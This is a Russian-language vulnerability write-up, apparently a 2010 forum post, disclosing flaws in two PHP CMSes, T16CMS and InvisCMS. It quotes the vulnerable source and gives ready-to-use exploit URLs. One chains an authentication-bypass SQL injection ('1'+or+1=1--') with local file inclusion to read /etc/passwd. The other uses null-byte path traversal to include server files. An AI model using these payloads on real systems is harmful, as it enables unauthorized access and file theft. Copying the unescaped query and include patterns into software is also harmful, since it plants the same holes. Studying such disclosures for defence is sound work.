
02.07.2010, 01:08
T16CMS v1.0
Download: http://code.google.com/p/t16cms/
SQL-инъекция (обход авторизации). Условие: magic_quotes_gpc = off — параметр authkey подставляется в запрос внутри одинарных кавычек без какого-либо экранирования, поэтому при включённых «магических кавычках» одиночная кавычка экранируется и инъекция не срабатывает. Попутно в коде оставлена отладка (echo $inp; echo $sql;): построенный SQL-запрос выводится прямо в ответ, что раскрывает структуру запроса и упрощает подбор полезной нагрузки.
Уязвимый файл:
./t16cms/php/user.php
Код:
PHP код:
function get_reg($inp="") {
    global $dbhost,$dbname,$dbuser,$dbpasswd,$dbprefix;
    echo $inp;
    if ($inp==""){
        if (@isset($_GET['authkey'])){
            $_authkey=$_GET['authkey'];
            if ($_authkey!=""){
                $sql='SELECT * FROM `_users` WHERE `authkey` = '."'".$_authkey."'".' LIMIT 1';
                echo $sql;
                mysql_connect($dbhost,$dbuser,$dbpasswd);
                mysql_query('SET NAMES cp1251');
                $i=1;
                $result=mysql_db_query($dbname,$sql);
                while($row=mysql_fetch_array($result)) {
                    if (get_right($row['access']['access'],1)){
                        global $site_user;
                        $site_user=$row;
                        $i=$i+1;
                    }else{echo "Вы видимо не активированный";}//уголь
                };
                mysql_free_result($result);
            }}
    }else {
    ...
LFI (требует авторизации: include выполняется только при get_reg()==1, однако в связке с инъекцией выше авторизация обходится без учётной записи). Параметр module лишь дополняется префиксом "modules/" и без какой-либо фильтрации передаётся в include, поэтому последовательность "../" выводит за пределы каталога модулей к произвольному файлу, доступному веб-серверу на чтение:
Уязвимый файл:
./t16cms/cp/index.php
Код:
PHP код:
if (isset($_GET['module'])){
    $default=$_GET['module'];
    ...
    $default="modules/".$default;
    ...
    if (get_reg()==1) {//авторизация, код выше
        ...
        include $default;
Эксплуатация (обе уязвимости одним запросом). Фрагмент «1'+or+1=1--+» закрывает строковый литерал и комментирует хвост запроса, включая LIMIT 1, поэтому выборка возвращает все строки `_users`, а цикл в get_reg() перебирает их все; судя по приведённому фрагменту, обход сработает только если хотя бы одна из строк проходит проверку get_right(..., 1), то есть является активированной учётной записью (возвращаемое значение get_reg() в фрагменте не показано). После этого module уходит в include без проверок:
./t16cms/cp/index.php?authkey=1'+or+1=1--+&module=../../../../etc/passwd
InvisCMS v0.15
Download: http://code.google.com/p/inviscms/
LFI (условие: magic_quotes_gpc = off — нулевой байт %00 нужен, чтобы отсечь жёстко добавляемый суффикс ".inc"; при включённых magic_quotes он превращается в «\0» и усечение не срабатывает). Дополнительное ограничение: начиная с PHP 5.3.4 нулевой байт в пути include отвергается, так что приём работает только на более старых версиях. Сам параметр frm_name никак не фильтруется: после file_exists() файл подключается через @include (ошибки подавлены), а затем то же значение с суффиксом "_main" передаётся в call_user_func — второй управляемый атакующим приёмник, хотя и ограниченный суффиксом.
Уязвимый файл:
./dx.php
Код:
PHP код:
...
switch ($_GET['x']):
...
case '0x21':
    $d=false;
    #die_r($_GET);
    if(isset($_GET['frm_name']) && $_GET['frm_name']!='' && isset($_GET['result']) && $_GET['result']!='')
    {
        $brain=$GLOBALS['path_to_site'].'/lib/core/others/forms/'.$_GET['frm_name'].'.inc';
        if(file_exists($brain))
        {
            @include($brain);
            #die(stripslashes($_GET['result']));
            $data=$jsondecoder->decode(stripslashes($_GET['result']));
            $d=call_user_func($_GET['frm_name'].'_main',$data[0]);
        }else{
            $d=false;
        }
    }
    print $jsonencoder->encode($d);
break;
Эксплуатация (x=33 попадает в ветку case '0x21' из-за нестрогого сравнения в switch: в PHP 5 строка '0x21' считается числовой и равна 33; параметр result должен быть лишь непустым — его значение декодируется как JSON и для чтения файла не важно; глубина "../" и путь к логу веб-сервера зависят от расположения установки и подбираются под конкретный сервер):
./dx.php?x=33&frm_name=../../../../../../apache/log%00&result=33серебреника